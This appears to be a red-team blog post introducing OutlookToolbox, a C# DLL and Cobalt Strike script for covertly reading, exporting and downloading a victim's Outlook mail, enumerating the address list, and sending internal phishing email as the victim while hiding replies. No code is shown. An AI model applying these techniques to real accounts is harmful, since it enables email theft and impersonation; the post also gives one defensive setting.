OutlookToolbox

Hey all,

Lately I’ve been neglecting my CTF posts so I could put some time into OutlookToolbox, a C# DLL that uses COM to target Outlook in the background.  Additionally, I put together a Cobalt Strike Aggressor script to assist with the execution of OutlookToolbox,  both of which can be found at the repository here – https://github.com/ThunderGunExpress/OutlookToolbox.

This is a quick and dirty post which will cover the features.  Later, I plan on creating another post which further explores potential use cases of OutlookToolbox.

Mandatory

  • Only use for good.
  • I have not done extensive testing with this tool, use at your own risk. I recommend testing OutlookToolbox on a replica of your target first.
  • The Aggressor script uses several brm (file and/or directory remove) function calls which can bulldoze entire directories if input is not sanitized correctly. I’ve tried to iron out all the issues, but still, I would put OutlookToolbox in a non-critical directory like C:\Users\Public\Documents just to be safe.

What it Does

  • Lists folders in Outlook (Inbox, Sent Items, Conversation History, Joe’s Custom Folder … )
  • Exports target folder to a CSV File
  • Enumerate targets using the GAL
  • Download specific messages
  • Sends an email on behalf of the target user

How to Prevent

Configure Outlook’s programmatic access security to report on suspicious activity – MS link.  Email encryption will cause several of these functions not to work, not a bad idea.

oSecurity

Cobalt Strike Aggressor Script

The following are screen captures of the Cobalt Strike Aggressor script that is in the github repository.  This is not required, an external application or rundll32 can be used instead.

Note, the script can be a bit buggy since I used beacon_output_alt to handle completion of downloads.

1

Upload OutlookToolbox DLL

This menu option will ask the user for the local location of the OutlookToolbox DLL.  It will upload the specified file to $targetDir, a global variable in the script which is currently configured to C:\Users\Public\Documents\ … do not change this to a critical directory like C:\ or C:\Windows\System32\, see the note about BRM above.  Once the upload is complete it will rename the file to OutlookToolbox.dll.

3

Delete OutlookToolbox DLL

4

Sample Sanity

This menu option calls the SanityCheck function, used to test for configurations which might cause a popup on the target machine.    This function checks the following:

  • Outlook is installed
  • Outlook is running (anything but 1 instance of Outlook.exe will cause OutlookToolbox.dll to stop)
  • ObjectModelGuard registry key
    • If Outlook is relying on AV, OutlookToolbox will check the status of AV and ensure it is up-to-date and enabled … funny, eh?
  • Checks that the process (Cobalt session) calling rundll32 is the same integrity level as Outlook.exe

5

Enumerate Folders

Enumerate Outlook’s folders and number items.

6

Enumerate Target

Gather information about target user using the GAL.  This can be used in conjunction with EmailPivot to increase the authenticity of an internal phish.

7

Folder To CSV

Exports target folder to a CSV file.  Body length is truncated to keep the size down.  This Cobalt Strike function uses sleep so it will seem like CS has hung, just wait it out.

8.png

Download Message

Downloads a single message if using index, or can download a collection of emails sent by a specified user.  If downloading several emails, OutlookToolbox will zip the contents before downloading.

9.png

Email Pivot

Sends an email on behalf of the target user using a specified .msg file.  Email pivot can also create an Outlook rule to mute replies from the target recipients.  Note that currently there is not function to remove rules.

10.png

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s